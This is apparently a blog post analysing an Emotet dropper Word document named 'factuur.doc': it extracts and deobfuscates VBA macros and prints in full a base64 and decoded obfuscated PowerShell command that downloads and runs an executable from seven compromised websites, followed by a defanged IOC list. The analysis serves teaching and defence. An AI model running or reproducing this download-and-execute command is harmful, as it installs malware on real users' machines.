Malicious Microsoft Office documents are one of the most common infection vectors. Usually received via email, they are the first step to compromise a system. I wanted to showcase in this article how this is usually performed, and share my analysis methods with you.
Initial assessment
Context
This file was detected as an attachment of numerous received emails. It was blocked by the email gateway.
Its name was factuur.doc
, which means “invoice”, a well known disguise for malware droppers.
- Name:
factuur.doc
- SHA256:
1adb160f0d40cb4f8e821fbc93c4f6289cc5d023584145904fa40838a329e661
- Context: attached to numerous received emails
- Antivirus Detection: dropper for Emotet
File type
First, let’s confirm what kind of file we are dealing with.
$ file factuur.doc
sample.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Numquam., Author: Enzo Poirier, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Aug 26 12:53:00 2020, Last Saved Time/Date: Wed Aug 26 12:53:00 2020, Number of Pages: 1, Number of Words: 4, Number of Characters: 24, Security: 0
This is a Microsoft Word document.
Note that this is a very small document: 4 words, 1 page. Typical of phishing documents.
The most common dangers in this type of document are either URLs leading to fake authentication forms to steal credentials or macros attempting to drop a payload on the system.
Suspicious elements
A quick look at the output of the oledump
command shows that 2 streams of the document contain macros, visible with the letter M
next to their stream ID: stream 8 and stream 9.
$ oledump.py factuur.doc
1: 114 '\x01CompObj'
2: 352 '\x05DocumentSummaryInformation'
3: 424 '\x05SummaryInformation'
4: 7035 '1Table'
5: 136577 'Data'
6: 524 'Macros/PROJECT'
7: 92 'Macros/PROJECTwm'
8: M 1340 'Macros/VBA/Lvenx3oasyi13'
9: M 14563 'Macros/VBA/Zoaes60ntol8thq'
10: 14994 'Macros/VBA/_VBA_PROJECT'
11: 1540 'Macros/VBA/__SRP_0'
12: 106 'Macros/VBA/__SRP_1'
13: 304 'Macros/VBA/__SRP_2'
14: 103 'Macros/VBA/__SRP_3'
15: 867 'Macros/VBA/dir'
16: 97 'Macros/Zoaes60ntol8thq/\x01CompObj'
17: 299 'Macros/Zoaes60ntol8thq/\x03VBFrame'
18: 510 'Macros/Zoaes60ntol8thq/f'
19: 112 'Macros/Zoaes60ntol8thq/i05/\x01CompObj'
20: 44 'Macros/Zoaes60ntol8thq/i05/f'
21: 0 'Macros/Zoaes60ntol8thq/i05/o'
22: 112 'Macros/Zoaes60ntol8thq/i07/\x01CompObj'
23: 44 'Macros/Zoaes60ntol8thq/i07/f'
24: 0 'Macros/Zoaes60ntol8thq/i07/o'
25: 25448 'Macros/Zoaes60ntol8thq/o'
26: 4096 'WordDocument'
Note: other objects are defined in the Macros
container. We will see later on how they are used.
Stage 1: An office document with VBA macros
Content extraction
Let’s dump the two macro streams we found in the previous part to dedicated files in order to analyze them.
$ oledump.py -s 8 -v factuur.doc > Lvenx3oasyi13.vba
$ oledump.py -s 9 -v factuur.doc > Zoaes60ntol8thq.vba
Entry point
The Lvenx3oasyi13
stream (stream 8) defines a Document_open()
subroutine which is run each time the document is opened in Microsoft Word.
|
|
All this function does is call another function X0yzd2pcuqu6rgv7z
defined by the other stream Zoaes60ntol8thq
(stream 9).
Code structure
The Zoaes60ntol8thq
stream contains 189 lines of obfuscated Visual Basic code.
|
|
Let’s try to understand how it is structured.
I usually split the code by jumping lines between functions to get a better understanding of how the different parts of the code interract with each other. We can now see that this stream defines 4 functions:
X0yzd2pcuqu6rgv7z
(the function called from the entry point)Rbvfavx90b1xyru_ld
E_xqabv70nlkt
Pr2zintnwof18susdt
Obfuscation patterns
Looking more closely at the code allows us to recognize some repetitive obfuscation patterns using math operations. Most of the time in obfuscated macros, this is just noise and has no influence on the result. Let’s check that it is the case here.
For example, the variable kgwv13T
is set multiple times to some numerical value, but it is never read anywhere else. (Ctrl+F is your friend)
Let’s remove all lines defining kgwv13T
!
The same reasoning also works for the variables EAIg
, EAIg
, wDXZ4
, AYOZk77j
. Let’s remove them.
Note that each statement is now preceded by On Error Resume Next
. Lets remove these lines for readability, keeping in mind that an error in one of those statements would not crash the entire macro.
About 30 lines of Visual Basic code are remaining. This is a lot easier to handle.
|
|
Let’s try to understand what it does.
Variables, functions and arguments
These functions heavily use obfuscation techniques such as undefined variables yielding default values, concatenations, conversions, numerical values decomposed in additions, data loaded from form fields…
Whenever possible, I try to use Microsoft Visual Basic to run the code after I placed some breakpoints at strategic positions. It is faster than manually looking for those values and rewriting each line to be human readable.
Even though I run it in a virtual machine, I do my best to avoid running unknown code, encrypted commands and so forth, because that is where the crispy (and risky) part resides.
Identifying dangerous parts and placing breakpoints
In order to choose the breakpoint positions, I identify the functions which can have side effects on the system or which “decrypt” data. I am particularly interested in the value of their arguments, and by what they return. I generally use functions which only “transform” data (decryption, deobfuscation, concatenation, computation…) as black boxes.
Here, I will consider the E_xqabv70nlkt
function as a black box since it only trims, splits and joins values. I will also consider the Pr2zintnwof18susdt
function as a black box since it only uses E_xqabv70nlkt
to transform data it loaded from a form.
The other two functions use CreateObject
with some currently obfuscated data, therefore I will closely look at their arguments and how data is deobfuscated around them.
Actually seeing what it does
The first 4 lines of X0yzd2pcuqu6rgv7z
are only building up the argument of the CreateObject
on the 5th line. Let’s pause the execution here to see what it creates.
A winmgmts:win32_Process
object! It will allow the macro to interract with the process creation API of Windows. It is not used right away, but only in the last line of the function.
The next 3 lines are only building up the argument of the Rbvfavx90b1xyru_ld
function. Let’s break here and see what it takes as an input.
The variable Mla0zvl2gwew1
now contains the value winmgmts:win32_ProcessstartuP
. The function Rbvfavx90b1xyru_ld
then instantiates this object, sets its ShowWindow
attribute to 0
as shown by the debugger below, and returns it.
In a nutshell, it just created an object containing process creation options/flags specifying that the window of the created process will be hidden to the user.
The last line of X0yzd2pcuqu6rgv7z
defines an array with 3 elements. The array elements are evaluated sequentially. This is a way to obfuscate a sequence of instructions. Some of them are useless, like the first element and the last element which only define strings. But the second element actually calls a function which perform an action.
The full function call is Xelc5tzs07v5p5d.Create(Pr2zintnwof18susdt, Lge51wtl_ks4aw, X3gj911lgo6y)
. If we replace the variables that we already know by some pseudo-code, it becomes Process.Create(Pr2zintnwof18susdt, NO_ARGUMENTS, HIDE_WINDOW)
. The first argument is the process that it launches. Let’s decrypt it by running the macro a little further.
The local variable panel shows that it is a powershell encoded command. However, the value is truncated by the viewer. When this happens, I edit the macro and use the Debug.Print
function to write the value to the “Execution” panel as shown below.
The value returned by Pr2zintnwof18susdt
is the following powershell base64 encoded command :
powersheLL -e JABYAG8AdgBmAHYAMgBuAD0AKAAnAEEAMwAnACsAKAAnAGcAZwAzACcAKwAnADgAdQAnACkAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgBWADoAVABlAG0AUABcAFcATwByAEQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQBSAEUAYwBUAE8AcgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIAYABpAGAAVAB5AHAAYABSAG8AdABPAGMAYABvAGwAIgAgAD0AIAAoACcAdAAnACsAKAAnAGwAcwAxADIAJwArACcALAAnACkAKwAnACAAdAAnACsAKAAnAGwAcwAxACcAKwAnADEALAAgAHQAJwApACsAJwBsAHMAJwApADsAJABGADQAcABfAHoAeQBhACAAPQAgACgAKAAnAFUAYQAnACsAJwBtAHIAcgAnACkAKwAnAGcAdAAnACkAOwAkAEIAcgA3AG4ANQBjAHIAPQAoACgAJwBRACcAKwAnAGQAawAnACkAKwAoACcAcAAnACsAJwBpAHEAZgAnACkAKQA7ACQASwBrADUAZQByAHcAdwA9ACQAZQBuAHYAOgB0AGUAbQBwACsAKAAoACgAJwBjACcAKwAnAEoAZAB3AG8AJwArACcAcgBkAGMAJwArACcASgAnACkAKwAnAGQAJwArACgAJwAyADAAMQAnACsAJwA5AGMAJwApACsAJwBKACcAKwAnAGQAJwApAC4AIgBSAEUAYABQAGAATABhAEMAZQAiACgAKABbAEMAaABhAFIAXQA5ADkAKwBbAEMAaABhAFIAXQA3ADQAKwBbAEMAaABhAFIAXQAxADAAMAApACwAJwBcACcAKQApACsAJABGADQAcABfAHoAeQBhACsAKAAnAC4AJwArACgAJwBlACcAKwAnAHgAZQAnACkAKQA7ACQAWAA5AGQAegBwAHAANAA9ACgAKAAnAEcAYwBoACcAKwAnAHoAbQAnACkAKwAnAHUANAAnACkAOwAkAEQAbwAzADEAMgBsAGwAPQAuACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAG4AZQBUAC4AdwBlAGIAYwBsAGkARQBOAHQAOwAkAEkAeQBiAGMAZwBpAGIAPQAoACgAJwBoAHQAdAAnACsAJwBwACcAKQArACcAOgAnACsAKAAnAC8AJwArACcALwBpAG4AbQAnACkAKwAnAGUAJwArACcAZAAnACsAJwAuAHYAJwArACgAJwBuAC8AdwAnACsAJwBwAC0AJwApACsAKAAnAGMAbwBuAHQAZQAnACsAJwBuAHQAJwApACsAKAAnAC8AJwArACcAQgBUACcAKQArACcAQQAnACsAJwB2AGgAJwArACcAdAAnACsAKAAnAEEAJwArACcALwAqAGgAdAB0ACcAKQArACgAJwBwACcAKwAnADoALwAvACcAKQArACcAcwAnACsAJwBvACcAKwAoACcAZgAnACsAJwB0AHAAJwArACcAYQByAGsALgBjACcAKQArACgAJwBvAG0ALgBiAHIAJwArACcALwBhACcAKQArACgAJwBkAG0AJwArACcAaQAnACkAKwAoACcAbgBpAHMAdAAnACsAJwByACcAKQArACgAJwBhACcAKwAnAHQAbwByACcAKQArACgAJwAvAHgAdwBGAHYAaQBsACcAKwAnADYAJwArACcAcgB6AHoAawAnACkAKwAnAGkAJwArACcAMAAyACcAKwAnADUAJwArACcANAAnACsAJwAvACcAKwAnACoAaAAnACsAJwB0AHQAJwArACgAJwBwADoALwAvAGIAJwArACcAbAAnACsAJwB1AGUAcAByACcAKQArACcAaQBuACcAKwAoACcAdAAuAHMAJwArACcAZAAnACkAKwAnAC8AJwArACcAYwAnACsAJwA4AGUAJwArACcAbAAnACsAJwB4ADMAJwArACgAJwBvAC8AJwArACcAeAB2AE0AJwArACcAQgBaACcAKQArACgAJwBaAGIAJwArACcAQQBJACcAKQArACgAJwBBAG8AcQAvACoAaAB0AHQAJwArACcAcAAnACsAJwBzACcAKQArACgAJwA6AC8ALwB1AHAAdAAnACsAJwBlACcAKwAnAGMAJwApACsAKAAnAGgAbgAnACsAJwBvAGwAJwArACcAbwBnAHkAJwArACcALgBjACcAKQArACgAJwBvAG0ALgAnACsAJwBiAHIAJwApACsAKAAnAC8AJwArACcAcgBlACcAKQArACgAJwBkAGUAJwArACcAcABhACcAKQArACcAeQAnACsAKAAnAC8AaQBtAGcAJwArACcALwAnACkAKwAoACcAZAAnACsAJwBEAGkATwBFAC8AKgAnACkAKwAoACcAaAAnACsAJwB0AHQAJwApACsAKAAnAHAAOgAvAC8AbQBhAHQAYQAnACsAJwBkAGUAJwArACcAYgAnACsAJwBlAG4AZgBpACcAKwAnAGMAYQAnACsAJwAuACcAKQArACcAYwBvACcAKwAnAG0ALwAnACsAKAAnAHAAZQByACcAKwAnAG0AYQBuACcAKwAnAGUAbgB0ACcAKQArACcAZQAnACsAKAAnAC8ASQBvACcAKwAnAEUAJwArACcAcwBYAG8AJwArACcASwBOAHMAJwArACcAUgBSAFEAJwApACsAKAAnAC8AJwArACcAKgBoACcAKwAnAHQAdABwADoAJwApACsAKAAnAC8ALwB0ACcAKwAnAGoAJwApACsAKAAnAHMAdABvACcAKwAnAHIAJwApACsAKAAnAGUALgBpAHIALwB3ACcAKwAnAHAALQAnACsAJwBhACcAKQArACgAJwBkAG0AaQBuACcAKwAnAC8AbABjAFYAVwAnACsAJwByAGgAJwApACsAKAAnAGQAbwAnACsAJwB5AHcAdgAnACsAJwBmADgAeAAnACsAJwA4ADcAMQAyAC8AJwApACsAKAAnACoAaAB0AHQAJwArACcAcAA6AC8AJwApACsAKAAnAC8AJwArACcAZwBhAHIAZAAnACsAJwBlAG4ALQAnACkAKwAnAGMAZQAnACsAKAAnAG4AdABlAHIAJwArACcALgAnACsAJwByACcAKwAnAG8ALwB3AHAAJwApACsAKAAnAC0AYwBvACcAKwAnAG4AdAAnACkAKwAoACcAZQBuACcAKwAnAHQALwBkAGQAJwApACsAKAAnAFkAJwArACcAegBYAGMAYQBMAC8AJwApACkALgAiAFMAcABgAEwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVwA2AGQAZQA2AF8AZAA9ACgAJwBIAGUAJwArACcAdQB5ACcAKwAoACcAdwAnACsAJwBlAGUAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABTAHkAbgBnADUANAB3ACAAaQBuACAAJABJAHkAYgBjAGcAaQBiACkAewB0AHIAeQB7ACQARABvADMAMQAyAGwAbAAuACIARABPAHcATgBsAGAAbwBhAGAAZABmAEkAbABFACIAKAAkAFMAeQBuAGcANQA0AHcALAAgACQASwBrADUAZQByAHcAdwApADsAJABXAHkAdQB0AGMANQBsAD0AKAAnAFIAJwArACcAdgAnACsAKAAnAGQAMgA3ADMAJwArACcAMQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABLAGsANQBlAHIAdwB3ACkALgAiAGwAZQBOAGAAZwBUAGgAIgAgAC0AZwBlACAAMgAxADYAOQA0ACkAIAB7AC4AKAAnAEkAJwArACcAbgB2AG8AJwArACcAawBlAC0ASQAnACsAJwB0AGUAbQAnACkAKAAkAEsAawA1AGUAcgB3AHcAKQA7ACQATwB1AG4AbQBiADQAOQA9ACgAJwBFACcAKwAoACcAbwBrACcAKwAnADcAZgB6ACcAKwAnAGYAJwApACkAOwBiAHIAZQBhAGsAOwAkAFcANQB5AGEAagB4AGMAPQAoACgAJwBNACcAKwAnAHAAawAnACkAKwAoACcAOAAnACsAJwBuAGMAdAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATABtAGIAdQAyAF8ANQA9ACgAJwBRAHkAJwArACgAJwA5AHAAJwArACcAYQAyACcAKQArACcAdAAnACkA
Once decoded (using the base64 -d
command or CyberChef whichever you like most), the exact command is :
$Xovfv2n=('A3'+('gg3'+'8u'));.('ne'+'w-i'+'tem') $ENV:TemP\WOrD\2019\ -itemtype diREcTOrY;[Net.ServicePointManager]::"*SecUr`i`Typ`RotOc`ol" = ('t'+('ls12'+',')+' t'+('ls1'+'1, t')+'ls');$F4p_zya = (('Ua'+'mrr')+'gt');$Br7n5cr=(('Q'+'dk')+('p'+'iqf'));$Kk5erww=$env:temp+((('c'+'Jdwo'+'rdc'+'J')+'d'+('201'+'9c')+'J'+'d')."RE`P`LaCe"(([ChaR]99+[ChaR]74+[ChaR]100),'\'))+$F4p_zya+('.'+('e'+'xe'));$X9dzpp4=(('Gch'+'zm')+'u4');$Do312ll=.('n'+'ew'+'-object') neT.webcliENt;$Iybcgib=(('htt'+'p')+':'+('/'+'/inm')+'e'+'d'+'.v'+('n/w'+'p-')+('conte'+'nt')+('/'+'BT')+'A'+'vh'+'t'+('A'+'/*htt')+('p'+'://')+'s'+'o'+('f'+'tp'+'ark.c')+('om.br'+'/a')+('dm'+'i')+('nist'+'r')+('a'+'tor')+('/xwFvil'+'6'+'rzzk')+'i'+'02'+'5'+'4'+'/'+'*h'+'tt'+('p://b'+'l'+'uepr')+'in'+('t.s'+'d')+'/'+'c'+'8e'+'l'+'x3'+('o/'+'xvM'+'BZ')+('Zb'+'AI')+('Aoq/*htt'+'p'+'s')+('://upt'+'e'+'c')+('hn'+'ol'+'ogy'+'.c')+('om.'+'br')+('/'+'re')+('de'+'pa')+'y'+('/img'+'/')+('d'+'DiOE/*')+('h'+'tt')+('p://mata'+'de'+'b'+'enfi'+'ca'+'.')+'co'+'m/'+('per'+'man'+'ent')+'e'+('/Io'+'E'+'sXo'+'KNs'+'RRQ')+('/'+'*h'+'ttp:')+('//t'+'j')+('sto'+'r')+('e.ir/w'+'p-'+'a')+('dmin'+'/lcVW'+'rh')+('do'+'ywv'+'f8x'+'8712/')+('*htt'+'p:/')+('/'+'gard'+'en-')+'ce'+('nter'+'.'+'r'+'o/wp')+('-co'+'nt')+('en'+'t/dd')+('Y'+'zXcaL/'))."Sp`LIt"([char]42);$W6de6_d=('He'+'uy'+('w'+'ee'));foreach($Syng54w in $Iybcgib){try{$Do312ll."DOwNl`oa`dfIlE"($Syng54w, $Kk5erww);$Wyutc5l=('R'+'v'+('d273'+'1'));If ((.('G'+'et-'+'Item') $Kk5erww)."leN`gTh" -ge 21694) {.('I'+'nvo'+'ke-I'+'tem')($Kk5erww);$Ounmb49=('E'+('ok'+'7fz'+'f'));break;$W5yajxc=(('M'+'pk')+('8'+'nct'))}}catch{}}$Lmbu2_5=('Qy'+('9p'+'a2')+'t')
This is an obfuscated powershell command, that we will consider as a second stage for the dropper.
Stage 2: obfuscated powershell command
This powershell script is lightly obfuscated and mainly uses string concatenations. You just need to spend a little time reconstructing the strings. If you are familiar with tools such as sed
, it can be very useful and fast.
Once the strings are readable, it is quite easy to rename the variables and cleanup the code to get a good glance at what it does.
|
|
It attempts to retrieve a payload from one out of the 7 listed compromised websites and drops it on the disk as the file %TEMP%\word\2019\Uamrrgt.exe
. The way the dropper determines if it retrieved the correct payload is by checking that its size is greater than 21694 bytes. It then runs the first correctly retrieved payload.
The job of the dropper stops here. The rest of the infection is done by the payload.
At the time of writing, two of these servers still serve the malicious payload.
Stage 3 : payloads
The only two payloads that I managed to retrieve are different:
$ sha256sum *
89a801afdf70466f14d4deead8cbb9645a299d2b62e048bfa9ca2531796666c6 7Zo0813874054.exe
65ca99334b8660e9e4c47fc4380fbe37b20c5f406a22522ee8aeb9700089902b FceMssA008184881513166.exe
However, the difference is small:
$ diff <(xxd FceMssA008184881513166.exe) <(xxd 7Zo0813874054.exe)
20654,20657c20654,20657
< 0050ad0: 6c42 0000 b360 8aaa 78de 1665 4b6c f90d lB...`..x..eKl..
< 0050ae0: fd2a 0783 c6a8 1006 365f 4d64 6bbc b0db .*......6_Mdk...
< 0050af0: 8cd4 1e6b 6da5 5e37 e20c 85f8 fe11 9d67 ...km.^7.......g
< 0050b00: 30b2 d900 3400 3800 0000 0000 0000 0000 0...4.8.........
---
> 0050ad0: 6c42 0000 8497 e893 70b8 98c1 03d1 940e lB......p.......
> 0050ae0: da6e 9652 58ae c117 13b6 e37d 28cb 728d .n.RX......}(.r.
> 0050af0: 04db 55f7 31b5 d7bf 214e 56d8 2555 4368 ..U.1...!NV.%UCh
> 0050b00: 7abd 0c00 3400 3800 0000 0000 0000 0000 z...4.8.........
This might be done to create different file signatures to avoid detection. According to a quick look in IDA, these bytes are in the .rdata
, but no reference to them were found.
Both of these payloads are detected as Emotet.
Conclusion
My analysis of this dropper ends here. I will keep the reverse engineering of the payload for another post, if I have time.
One of the reasons to analyze a dropper by hand like this, other than learning, is to make sure that there were no hidden capabilities. For example, we saw that 7 different websites are used by this dropper to retrieve a payload. A sandbox analysis might have only returned the first website.
Of course, there are tools and methods to do this faster such as VBA emulators to retrieve the decrypted strings from the macros. In this specific case, since the macro itself did not include the “multiple C&C” logic, a sandbox would have allowed to see the powershell process being spawned. And an analysis of the powershell command would have been sufficient to retrieve the list of all possible C&C domains. But we never know beforehand! :)
IOCs
factuur.doc
1adb160f0d40cb4f8e821fbc93c4f6289cc5d023584145904fa40838a329e661
%TEMP%\word\2019\Uamrrgt.exe
hxxp://inmed[.]vn/wp-content/BTAvhtA/
hxxp://softpark.com[.]br/administrator/xwFvil6rzzki0254/
hxxps://uptechnology.com[.]br/redepay/img/dDiOE/
hxxp://blueprint[.]sd/c8elx3o/xvMBZZbAIAoq/
hxxp://matadebenfica[.]com/permanente/IoEsXoKNsRRQ/
hxxp://tjstore[.]ir/wp-admin/lcVWrhdoywvf8x8712/
hxxp://garden-center[.]ro/wp-content/ddYzXcaL/
89a801afdf70466f14d4deead8cbb9645a299d2b62e048bfa9ca2531796666c6
7Zo0813874054.exe
65ca99334b8660e9e4c47fc4380fbe37b20c5f406a22522ee8aeb9700089902b
FceMssA008184881513166.exe